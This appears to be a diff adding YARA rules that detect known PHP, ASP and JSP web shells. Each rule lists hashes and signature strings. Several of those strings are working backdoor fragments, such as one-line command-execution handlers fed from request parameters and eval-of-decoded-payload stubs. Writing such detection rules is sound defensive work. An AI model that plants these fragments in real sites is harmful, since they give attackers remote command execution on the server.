+		score = 70
+		hash = "fdbf54d5bf3264eb1c4bff1fac548879"
+	strings:
+		$s1 = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value"
+		$s6 = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f"
+	condition:
+		all of them
+}
+rule webshell_r57_1_4_0 {
+	meta:
+		description = "Web Shell - file r57.1.4.0.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "574f3303e131242568b0caf3de42f325"
+	strings:
+		$s4 = "@ini_set('error_log',NULL);" fullword
+		$s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+		$s7 = "@ini_restore(\"disable_functions\");" fullword
+		$s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_hsxa1 {
+	meta:
+		description = "Web Shell - file hsxa1.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5686d5a38c6f5b8c55095af95c2b0244"
+	strings:
+		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
+	condition:
+		all of them
+}
+rule webshell_asp_ajn {
+	meta:
+		description = "Web Shell - file ajn.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "aaafafc5d286f0bff827a931f6378d04"
+	strings:
+		$s1 = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword
+		$s6 = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve"
+	condition:
+		all of them
+}
+rule webshell_php_cmd {
+	meta:
+		description = "Web Shell - file cmd.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c38ae5ba61fd84f6bbbab98d89d8a346"
+	strings:
+		$s0 = "if($_GET['cmd']) {" fullword
+		$s1 = "// cmd.php = Command Execution" fullword
+		$s7 = "  system($_GET['cmd']);" fullword
+	condition:
+		all of them
+}
+rule webshell_asp_list {
+	meta:
+		description = "Web Shell - file list.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1cfa493a165eb4b43e6d4cc0f2eab575"
+	strings:
+		$s0 = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword
+		$s4 = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword
+	condition:
+		all of them
+}
+rule webshell_PHP_co {
+	meta:
+		description = "Web Shell - file co.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "62199f5ac721a0cb9b28f465a513874c"
+	strings:
+		$s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword
+		$s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword
+	condition:
+		all of them
+}
+rule webshell_PHP_150 {
+	meta:
+		description = "Web Shell - file 150.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "400c4b0bed5c90f048398e1d268ce4dc"
+	strings:
+		$s0 = "HJ3HjqxclkZfp"
+		$s1 = "<? eval(gzinflate(base64_decode('" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_cmdjsp_2 {
+	meta:
+		description = "Web Shell - file cmdjsp.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1b5ae3649f03784e2a5073fa4d160c8b"
+	strings:
+		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+		$s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+	condition:
+		all of them
+}
+rule webshell_PHP_c37 {
+	meta:
+		description = "Web Shell - file c37.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d01144c04e7a46870a8dd823eb2fe5c8"
+	strings:
+		$s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),"
+		$s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],"
+	condition:
+		all of them
+}
+rule webshell_PHP_b37 {
+	meta:
+		description = "Web Shell - file b37.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "0421445303cfd0ec6bc20b3846e30ff0"
+	strings:
+		$s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc"
+	condition:
+		all of them
+}
+rule webshell_php_backdoor {
+	meta:
+		description = "Web Shell - file php-backdoor.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+	strings:
+		$s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword
+		$s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
+	condition:
+		all of them
+}
+rule webshell_asp_dabao {
+	meta:
+		description = "Web Shell - file dabao.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3919b959e3fa7e86d52c2b0a91588d5d"
+	strings:
+		$s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location =&#039;\" &"
+		$s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-"
+	condition:
+		all of them
+}
+rule webshell_php_2 {
+	meta:
+		description = "Web Shell - file 2.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "267c37c3a285a84f541066fc5b3c1747"
+	strings:
+		$s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword
+	condition:
+		all of them
+}
+rule webshell_asp_cmdasp {
+	meta:
+		description = "Web Shell - file cmdasp.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "57b51418a799d2d016be546f399c2e9b"
+	strings:
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+	condition:
+		all of them
+}
+rule webshell_spjspshell {
+	meta:
+		description = "Web Shell - file spjspshell.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d39d51154aaad4ba89947c459a729971"
+	strings:
+		$s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:"
+	condition:
+		all of them
+}
+rule webshell_jsp_action {
+	meta:
+		description = "Web Shell - file action.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5a7d931094f5570aaf5b7b3b06c3d8c0"
+	strings:
+		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword
+		$s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword
+	condition:
+		all of them
+}
+rule webshell_Inderxer {
+	meta:
+		description = "Web Shell - file Inderxer.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "9ea82afb8c7070817d4cdf686abe0300"
+	strings:
+		$s4 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
+	condition:
+		all of them
+}
+rule webshell_asp_Rader {
+	meta:
+		description = "Web Shell - file Rader.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ad1a362e0a24c4475335e3e891a01731"
+	strings:
+		$s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0"
+		$s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 "
+	condition:
+		all of them
+}
+rule webshell_c99_madnet_smowu {
+	meta:
+		description = "Web Shell - file smowu.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3aaa8cad47055ba53190020311b0fb83"
+	strings:
+		$s0 = "//Authentication" fullword
+		$s1 = "$login = \"" fullword
+		$s2 = "eval(gzinflate(base64_decode('"
+		$s4 = "//Pass"
+		$s5 = "$md5_pass = \""
+		$s6 = "//If no pass then hash"
+	condition:
+		all of them
+}
+rule webshell_php_moon {
+	meta:
+		description = "Web Shell - file moon.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "2a2b1b783d3a2fa9a50b1496afa6e356"
+	strings:
+		$s2 = "echo '<option value=\"create function backshell returns string soname"
+		$s3 = "echo      \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\""
+		$s8 = "echo '<option value=\"select cmdshell(\\'net user "
+	condition:
+		2 of them
+}
+rule webshell_jsp_jdbc {
+	meta:
+		description = "Web Shell - file jdbc.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "23b0e6f91a8f0d93b9c51a2a442119ce"
+	strings:
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+	condition:
+		all of them
+}
+rule webshell_minupload {
+	meta:
+		description = "Web Shell - file minupload.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ec905a1395d176c27f388d202375bdf9"
+	strings:
+		$s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">   " fullword
+		$s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859"
+	condition:
+		all of them
+}
+rule webshell_ELMALISEKER_Backd00r {
+	meta:
+		description = "Web Shell - file ELMALISEKER Backd00r.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3aa403e0a42badb2c23d4a54ef43e2f4"
+	strings:
+		$s0 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio"
+		$s2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req"
+	condition:
+		all of them
+}
+rule webshell_PHP_bug_1_ {
+	meta:
+		description = "Web Shell - file bug (1).php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "91c5fae02ab16d51fc5af9354ac2f015"
+	strings:
+		$s0 = "@include($_GET['bug']);" fullword
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_hkmjj {
+	meta:
+		description = "Web Shell - file hkmjj.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e7b994fe9f878154ca18b7cde91ad2d0"
+	strings:
+		$s6 = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\"  " fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_asd {
+	meta:
+		description = "Web Shell - file asd.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a042c2ca64176410236fcc97484ec599"
+	strings:
+		$s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword
+		$s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url"
+	condition:
+		all of them
+}
+rule webshell_jsp_inback3 {
+	meta:
+		description = "Web Shell - file inback3.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ea5612492780a26b8aa7e5cedd9b8f4e"
+	strings:
+		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
+	condition:
+		all of them
+}
+rule webshell_metaslsoft {
+	meta:
+		description = "Web Shell - file metaslsoft.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "aa328ed1476f4a10c0bcc2dde4461789"
+	strings:
+		$s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t"
+	condition:
+		all of them
+}
+rule webshell_asp_Ajan {
+	meta:
+		description = "Web Shell - file Ajan.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b6f468252407efc2318639da22b08af0"
+	strings:
+		$s3 = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate"
+	condition:
+		all of them
+}
+rule webshell_config_myxx_zend {
+	meta:
+		description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash1 = "e0354099bee243702eb11df8d0e046df"
+		hash2 = "591ca89a25f06cf01e4345f98a22845c"
+	strings:
+		$s3 = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');"
+	condition:
+		all of them
+}
+rule webshell_browser_201_3_ma_download {
+	meta:
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash4 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+	strings:
+		$s2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a"
+		$s3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith"
+	condition:
+		all of them
+}
+rule webshell_itsec_itsecteam_shell_jHn {
+	meta:
+		description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
+		hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+		hash2 = "40c6ecf77253e805ace85f119fe1cebb"
+	strings:
+		$s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b"
+		$s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'"
+	condition:
+		all of them
+}
+rule webshell_ghost_source_icesword_silic {
+	meta:
+		description = "Web Shell - from files ghost_source.php, icesword.php, silic.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "cbf64a56306c1b5d98898468fc1fdbd8"
+		hash1 = "6e20b41c040efb453d57780025a292ae"
+		hash2 = "437d30c94f8eef92dc2f064de4998695"
+	strings:
+		$s3 = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $"
+		$s6 = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST["
+	condition:
+		all of them
+}
+rule webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash6 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash7 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash8 = "d71716df5042880ef84427acee8b121e"
+		hash9 = "341298482cf90febebb8616426080d1d"
+		hash10 = "29aebe333d6332f0ebc2258def94d57e"
+		hash11 = "42654af68e5d4ea217e6ece5389eb302"
+		hash12 = "88fc87e7c58249a398efd5ceae636073"
+		hash13 = "4a812678308475c64132a9b56254edbc"
+		hash14 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash15 = "344f9073576a066142b2023629539ebd"
+		hash16 = "32dea47d9c13f9000c4c807561341bee"
+		hash17 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash18 = "655722eaa6c646437c8ae93daac46ae0"
+		hash19 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash20 = "9c94637f76e68487fa33f7b0030dd932"
+		hash21 = "6acc82544be056580c3a1caaa4999956"
+		hash22 = "6aa32a6392840e161a018f3907a86968"
+		hash23 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash24 = "3ea688e3439a1f56b16694667938316d"
+		hash25 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash26 = "71097537a91fac6b01f46f66ee2d7749"
+		hash27 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash28 = "7a4b090619ecce6f7bd838fe5c58554b"
+	strings:
+		$s8 = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype="
+		$s9 = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T"
+	condition:
+		all of them
+}
+rule webshell_2_520_job_ma1_ma4_2 {
+	meta:
+		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "56c005690da2558690c4aa305a31ad37"
+		hash3 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash4 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash5 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
+	strings:
+		$s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" "
+		$s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR"
+	condition:
+		all of them
+}
+rule webshell_000_403_807_a_c5_config_css_dm_he1p_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_xxx {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash9 = "d71716df5042880ef84427acee8b121e"
+		hash10 = "341298482cf90febebb8616426080d1d"
+		hash11 = "29aebe333d6332f0ebc2258def94d57e"
+		hash12 = "42654af68e5d4ea217e6ece5389eb302"
+		hash13 = "88fc87e7c58249a398efd5ceae636073"
+		hash14 = "4a812678308475c64132a9b56254edbc"
+		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash16 = "e0354099bee243702eb11df8d0e046df"
+		hash17 = "344f9073576a066142b2023629539ebd"
+		hash18 = "32dea47d9c13f9000c4c807561341bee"
+		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash20 = "655722eaa6c646437c8ae93daac46ae0"
+		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash22 = "9c94637f76e68487fa33f7b0030dd932"
+		hash23 = "6acc82544be056580c3a1caaa4999956"
+		hash24 = "6aa32a6392840e161a018f3907a86968"
+		hash25 = "591ca89a25f06cf01e4345f98a22845c"
+		hash26 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash27 = "3ea688e3439a1f56b16694667938316d"
+		hash28 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash29 = "71097537a91fac6b01f46f66ee2d7749"
+		hash30 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash31 = "7a4b090619ecce6f7bd838fe5c58554b"
+	strings:
+		$s0 = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword
+		$s1 = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword
+	condition:
+		all of them
+}
+rule webshell_wso2_5_1_wso2_5_wso2 {
+	meta:
+		description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "dbeecd555a2ef80615f0894027ad75dc"
+		hash1 = "7c8e5d31aad28eb1f0a9a53145551e05"
+		hash2 = "cbc44fb78220958f81b739b493024688"
+	strings:
+		$s7 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec"
+		$s8 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na"
+	condition:
+		all of them
+}
+rule webshell_000_403_c5_queryDong_spyjsp2010_t00ls {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash4 = "655722eaa6c646437c8ae93daac46ae0"
+		hash5 = "9c94637f76e68487fa33f7b0030dd932"
+	strings:
+		$s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')"
+		$s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\""
+	condition:
+		all of them
+}
+rule webshell_404_data_suiyue {
+	meta:
+		description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+	strings:
+		$s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+"
+	condition:
+		all of them
+}
+rule webshell_r57shell_r57shell127_SnIpEr_SA_Shell_EgY_SpIdEr_ShElL_V2_r57_xxx {
+	meta:
+		description = "Web Shell - from files r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ef43fef943e9df90ddb6257950b3538f"
+		hash1 = "ae025c886fbe7f9ed159f49593674832"
+		hash2 = "911195a9b7c010f61b66439d9048f400"
+		hash3 = "697dae78c040150daff7db751fc0c03c"
+		hash4 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash5 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash6 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash7 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash8 = "41af6fd253648885c7ad2ed524e0692d"
+		hash9 = "6fcc283470465eed4870bcc3e2d7f14d"
+	strings:
+		$s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name"
+		$s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1"
+		$s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size="
+	condition:
+		all of them
+}
+rule webshell_807_a_css_dm_he1p_JspSpy_xxx {
+	meta:
+		description = "Web Shell - from files 807.jsp, a.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, style.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash1 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash3 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash4 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash5 = "d71716df5042880ef84427acee8b121e"
+		hash6 = "341298482cf90febebb8616426080d1d"
+		hash7 = "29aebe333d6332f0ebc2258def94d57e"
+		hash8 = "42654af68e5d4ea217e6ece5389eb302"
+		hash9 = "88fc87e7c58249a398efd5ceae636073"
+		hash10 = "4a812678308475c64132a9b56254edbc"
+		hash11 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash12 = "344f9073576a066142b2023629539ebd"
+		hash13 = "32dea47d9c13f9000c4c807561341bee"
+		hash14 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash15 = "6acc82544be056580c3a1caaa4999956"
+		hash16 = "6aa32a6392840e161a018f3907a86968"
+		hash17 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash18 = "3ea688e3439a1f56b16694667938316d"
+		hash19 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash20 = "71097537a91fac6b01f46f66ee2d7749"
+		hash21 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash22 = "7a4b090619ecce6f7bd838fe5c58554b"
+	strings:
+		$s1 = "\"<h2>Remote Control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var"
+		$s2 = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu"
+		$s3 = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i"
+	condition:
+		all of them
+}
+rule webshell_201_3_ma_download {
+	meta:
+		description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash1 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash2 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+	strings:
+		$s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su"
+		$s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but"
+		$s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class="
+	condition:
+		all of them
+}
+rule webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download {
+	meta:
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "36331f2c81bad763528d0ae00edf55be"
+		hash4 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash5 = "8979594423b68489024447474d113894"
+		hash6 = "ec482fc969d182e5440521c913bab9bd"
+		hash7 = "f98d2b33cd777e160d1489afed96de39"
+		hash8 = "4b4c12b3002fad88ca6346a873855209"
+		hash9 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash10 = "e9a5280f77537e23da2545306f6a19ad"
+		hash11 = "598eef7544935cf2139d1eada4375bb5"
+		hash12 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+	strings:
+		$s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword
+		$s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword
+	condition:
+		all of them
+}
+rule webshell_shell_phpspy_2006_arabicspy {
+	meta:
+		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "40a1f840111996ff7200d18968e42cfe"
